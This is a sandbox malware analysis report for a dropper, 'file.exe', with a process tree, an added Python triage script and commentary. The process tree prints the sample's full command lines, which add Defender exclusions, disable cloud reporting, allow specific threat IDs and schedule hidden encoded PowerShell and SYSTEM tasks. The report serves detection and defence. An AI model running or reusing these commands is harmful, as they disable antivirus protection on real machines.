Windows Analysis Report
file.exe
Overview
General Information
Detection
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5932 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
- Install.exe (PID: 4760 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
- Install.exe (PID: 5620 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
- forfiles.exe (PID: 4732 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32& REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
- conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 3096 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
- reg.exe (PID: 1544 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- reg.exe (PID: 6180 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- forfiles.exe (PID: 5064 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32& REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
- conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 6152 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
- reg.exe (PID: 6172 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- reg.exe (PID: 6208 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- schtasks.exe (PID: 6236 cmdline: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 6276 cmdline: schtasks /run /I /tn "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 6332 cmdline: schtasks /DELETE /F /TN "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 6488 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

- powershell.exe (PID: 6316 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpupdate.exe (PID: 6752 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
- conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

- pJKKXsE.exe (PID: 6576 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
- powershell.exe (PID: 6604 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Pol
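The process tree above is the whole story of this sample's Defender tampering: reg.exe is launched through forfiles.exe so that the direct parent of the registry writes is a benign LOLBin, the writes go to the Group Policy hive (HKLM\SOFTWARE\Policies\Microsoft\Windows Defender) in both the 32-bit and 64-bit views, a scheduled task runs an encoded PowerShell one-liner, and a second task runs the dropped pJKKXsE.exe (same MD5 as the second Install.exe) as SYSTEM. The Python below is an added triage example written for this page, not output of the sandbox or code from the sample: it decodes the -EncodedCommand argument (PowerShell expects base64 of UTF-16LE), extracts every REG ADD aimed at the Defender policy hive including the \"-escaped form seen under forfiles.exe and powershell.exe, and flags tasks created with /RU SYSTEM. The sample command lines are copied from the tree above, with the long ThreatIDDefaultAction line shortened to its first two REG ADD calls; the mapping of ThreatIDDefaultAction data values to actions (6 = Allow) follows the Defender "Threats" policy definitions, and the function names are this example's own.

```python
import base64
import re

# Sample input constructed for this example: command lines copied from the
# report's process tree. The ThreatIDDefaultAction line is shortened to its
# first two REG ADD calls (the real one repeats the pattern per threat ID).
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64"',
    r'schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F',
]

DEFENDER_POLICY = r'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender'

# One REG ADD: key in plain quotes or in the \"...\" form used inside a wrapper
# command; arguments run up to the next & or ; that chains the next command.
REG_ADD_RE = re.compile(r'REG\s+ADD\s+\\?"(?P<key>[^"]+?)\\?"(?P<args>[^&;]*)', re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RE = re.compile(r'-e(?:c|nc|ncoded|ncodedcommand)?\s+"?([A-Za-z0-9+/=]{8,})', re.I)
RUN_AS_RE = re.compile(r'/RU\s+"?([^"\s]+)', re.I)

# Data values of Threats\ThreatIDDefaultAction as defined by the Defender policy.
THREAT_ACTIONS = {'1': 'Clean', '2': 'Quarantine', '3': 'Remove', '6': 'Allow',
                  '8': 'User defined', '9': 'No action', '10': 'Block'}


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode('utf-16-le').rstrip('\x00')
    except (ValueError, UnicodeDecodeError):
        return None


def find_defender_policy_writes(cmdline):
    """Every REG ADD in the command line whose key is under the Defender policy hive."""
    hits = []
    for m in REG_ADD_RE.finditer(cmdline):
        key = m.group('key').rstrip('\\')
        if not key.lower().startswith(DEFENDER_POLICY.lower()):
            continue
        args = m.group('args')
        name = re.search(r'/v\s+\\?"?([^"\\\s]+)', args, re.I)
        typ = re.search(r'/t\s+(\S+)', args, re.I)
        data = re.search(r'/d\s+(\S+)', args, re.I)
        view = re.search(r'/reg:(32|64)', args, re.I)
        hits.append({
            'subkey': key[len(DEFENDER_POLICY):].lstrip('\\'),
            'name': name.group(1) if name else None,
            'type': typ.group(1) if typ else None,
            'data': data.group(1) if data else None,
            'view': view.group(1) if view else None,   # /reg:32 or /reg:64
        })
    return hits


def describe(hit):
    """Translate one policy write into its effect on Defender."""
    sub, name, data = hit['subkey'].lower(), hit['name'], hit['data']
    if sub == r'exclusions\extensions':
        return f'exclude every *.{name} file from scanning'      # value NAME is the extension
    if sub == 'spynet' and (name or '').lower() == 'spynetreporting' and data == '0':
        return 'disable MAPS/SpyNet cloud reporting'
    if sub == r'threats\threatiddefaultaction':
        return f'set default action for threat ID {name} to {THREAT_ACTIONS.get(data, data)}'
    return f'write {sub}\\{name} = {data}'


def triage(cmdlines):
    """Return (kind, registry view, detail) findings for a list of command lines."""
    findings = []
    for cmd in cmdlines:
        for hit in find_defender_policy_writes(cmd):
            findings.append(('defender_policy', hit['view'], describe(hit)))
        decoded = decode_encoded_command(cmd)
        if decoded:
            findings.append(('encoded_powershell', None, decoded))
        if 'schtasks' in cmd.lower():
            ru = RUN_AS_RE.search(cmd)
            if ru and ru.group(1).upper() == 'SYSTEM':
                findings.append(('task_as_system', None, cmd))
    return findings


if __name__ == '__main__':
    for kind, view, detail in triage(SAMPLE_CMDLINES):
        print(f'{kind:20} {view or "-":>3}  {detail}')
```

The decoded task command is `start-process -WindowStyle Hidden gpupdate.exe /force`, which is exactly the gpupdate.exe process that appears later in the tree: the sample writes its tampering into the policy hive and then forces a policy refresh so Defender picks the values up. Any host where these policy values exist without a matching GPO should be treated as compromised; the ThreatIDDefaultAction entries in particular whitelist specific detections rather than disabling the engine, so Defender still looks healthy.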